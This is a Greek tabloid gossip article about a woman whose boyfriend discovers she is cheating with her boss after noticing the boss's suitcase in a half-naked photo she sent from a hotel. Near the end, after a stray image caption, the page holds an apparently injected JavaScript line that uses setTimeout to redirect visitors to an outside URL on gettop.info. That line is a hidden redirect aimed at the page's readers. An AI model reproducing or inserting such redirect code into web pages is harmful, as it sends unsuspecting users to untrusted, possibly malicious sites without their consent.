Έστελνε στον φίλο της σέξι φωτογραφίες και εκείνος κατάλαβε ότι τον απατά

0
9

Όταν η Τζακι έστελνε ημίγυμνες φωτογραφίες της στον φίλο της απο ένα ξενοδχείο στην Ατλάντα όπου είχε πάει σε επαγγελματικό ταξίδι δεν φανταζόταν ποτέ ότι θα την ανακάλυπτε.

Αρχικά «κλάφτηκε» ότι η εταιρεία της την είχε «αγγαρέψει» να πάει μόνη της στο ταξίδι και ετοιμάστηκε μη έχοντας επιλογή.

Η Τζάκι έφυγε κανονικά για το ταξίδι της και, μετά από μερικές ώρες έστειλε στο αγόρι της μήνυμα πως έφτασε και πως η πτήση της είχε μια μικρή καθυστέρηση. Στη συνέχεια του έστειλε μια ημίγυμνη φωτογραφία της.

keratas

Εκεί όμως την πάτησε και το αγόρι της αντελήφθη ότι η κοπέλα του τον απατούσε. Τι είχε συμβεί; Στην άκρη της φωτογραφίας διακρινόταν μια βαλίτσα η οποία άνηκε στο αφεντικό της Τζάκι και το αγόρι της την αναγνώρισε.
Τότε πήρε τηλέφωνο στη ρεσεψιόν και ζήτησε να τον συνδέσουν με την κα Τζάκι…. και οι υπάλληλοι του είπαν ότι δεν υπάρχει κράτηση σε αυτό το όνομα. Στη συνέχεια ζήτησε το δωμάτιο στο όνομα του αφεντικού της κοπέλας του και αμέσως τον συνέδεσαν με το δωμάτιο της.

Έτσι αφού την «στόλισε»της έγραψε: «τα πράγματα σου θα σε περιμένουν σε σακούλες σκουπιδιών όταν γυρίσεις. Περνά καλά με τον Τομ και άντε γ@@@@@».
keratas1 setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here